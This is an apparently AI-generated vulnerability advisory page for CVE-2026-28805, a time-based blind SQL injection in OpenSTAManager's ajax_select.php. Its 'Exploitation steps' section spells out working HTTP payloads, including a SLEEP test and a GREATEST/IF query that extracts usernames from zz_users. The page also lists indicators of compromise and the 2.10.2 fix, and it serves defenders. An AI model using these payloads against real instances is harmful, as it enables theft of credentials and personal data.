CVE-2026-28805: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-28805 is a Time-Based Blind SQL Injection vulnerability in OpenSTAManager affecting all versions up to and including 2.10.1. Multiple AJAX select handlers fail to sanitize the options[stato] GET parameter before concatenating it directly into SQL WHERE clauses, enabling authenticated attackers to inject arbitrary SQL statements. The vulnerability was published on April 1, 2026, and patched in version 2.10.2 released shortly after. It carries a CVSS v3.1 base score of 8.8 (High) (GitHub Advisory).

Technical details

The root cause is CWE-89 (Improper Neutralization of Special Elements used in an SQL Command). In three affected modules — Preventivi (modules/preventivi/ajax/select.php, line 60), Ordini (modules/ordini/ajax/select.php, line 52), and Contratti (modules/contratti/ajax/select.php, line 57) — the $stato variable is read from $superselect['stato'] and concatenated directly into SQL WHERE clauses as a bare expression (e.g., $where[] = '('.$stato.' = 1)'). Although the input passes through HTMLPurifier, that library is designed for XSS prevention and does not strip SQL keywords (SELECT, SLEEP, IF, UNION) or SQL-significant characters ((, ), =, '). The > character is stripped by HTMLPurifier but can be bypassed using MySQL's GREATEST() function, allowing time-based boolean extraction of arbitrary data (GitHub Advisory, OSM Security Advisory).

Impact

A successful exploit allows an authenticated attacker to extract the entire MySQL database contents, including usernames, bcrypt password hashes, personally identifiable information (PII), and financial records such as invoices, quotes, contracts, and payments. Integrity is also at risk, as MySQL subquery capabilities (INSERT/UPDATE) may allow data modification. Availability can be degraded by injecting resource-intensive SLEEP() calls or heavy queries, causing denial of service against the database server (GitHub Advisory).

Exploitability

A detailed proof-of-concept (PoC) is publicly available in the official GitHub Security Advisory, including step-by-step HTTP requests with crafted options[stato] payloads (e.g., 1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)+AND+(1) that trigger measurable SLEEP delays and enable character-by-character data extraction. Exploitation requires only a valid user account at any privilege level and network access to the application. The EPSS score is approximately 0.031% (4th percentile), and there is no current evidence of in-the-wild exploitation or CISA KEV catalog listing (GitHub Advisory, OSM Security Advisory).

Exploitation steps

  1. Reconnaissance: Identify OpenSTAManager instances running version ≤ 2.10.1 via network scanning or web application fingerprinting. The application is typically accessible via HTTP/HTTPS.
  2. Authenticate: Send a POST request to /index.php with valid credentials (op=login&username=<user>&password=<pass>). Capture the PHPSESSID cookie from the Set-Cookie response header.
  3. Confirm injection (timing test): Send a baseline GET request to establish normal response time (~200ms):
    GET /ajax_select.php?op=preventivi&options[idanagrafica]=1&options[stato]=is_pianificabile
    Cookie: PHPSESSID=<session>
    Then send the injection payload and observe a ~10-second delay:
    GET /ajax_select.php?op=preventivi&options[idanagrafica]=1&options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)+AND+(1
    Cookie: PHPSESSID=<session>
  4. Extract data via binary search: Use time-based boolean conditions with IF() and GREATEST() (to bypass > stripping) to extract data character by character. Example to determine username length:
    GET /ajax_select.php?op=preventivi&options[idanagrafica]=1&options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(IF((GREATEST(LENGTH((SELECT+username+FROM+zz_users+LIMIT+0,1)),3%2B1)%3DLENGTH((SELECT+username+FROM+zz_users+LIMIT+0,1))),SLEEP(2),0)))a)+AND+(1
  5. Repeat for other endpoints: Apply the same technique to /ajax_select.php?op=ordini-cliente and /ajax_select.php?op=contratti using their respective payload structures to confirm and broaden data extraction scope (GitHub Advisory, OSM Security Advisory).

Indicators of compromise

  • Network: Unusual GET requests to /ajax_select.php with options[stato] parameter values containing SQL keywords (SLEEP, SELECT, IF, GREATEST, UNION) or encoded SQL characters (%2B, %3D, %28, %29); repeated requests to the same endpoint with incrementally varying payloads (indicative of binary search extraction).
  • Logs: Web server access logs showing requests to /ajax_select.php?op=preventivi, /ajax_select.php?op=ordini-cliente, or /ajax_select.php?op=contratti with anomalously long options[stato] parameter values; response times significantly exceeding baseline (>2 seconds) for these endpoints.
  • Database: MySQL slow query logs recording SLEEP() function calls or unusually complex subqueries originating from the application's database user; repeated queries against zz_users or other sensitive tables outside normal application patterns (GitHub Advisory).

Mitigation and workarounds

Update OpenSTAManager to version 2.10.2 or later, which addresses this vulnerability by implementing allowlist validation for the $stato parameter in all three affected modules and wrapping column names in backticks (OSM Release v2.10.2). The fix (commits 679c40f and 50b9089) validates $stato against a predefined list of permitted column names (e.g., ['is_pianificabile', 'is_completato', 'is_fatturabile', 'is_concluso']) before use in SQL, falling back to a safe default if the value is not in the allowlist (Patch Commit 1, Patch Commit 2). As an interim measure, restrict access to AJAX endpoints by IP or authentication controls, and monitor database activity for anomalous SLEEP() calls or bulk data queries.

Community reactions

The vulnerability was discovered and reported by security researcher Omar Ramirez (GitHub: ormzro), who published a detailed advisory including root cause analysis, proof-of-concept requests, and remediation options (OSM Security Advisory). Coverage appeared on The Hacker Wire and was indexed by INCIBE-CERT and other vulnerability tracking platforms shortly after disclosure (GitHub Advisory). No significant broader community debate or vendor controversy has been noted.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management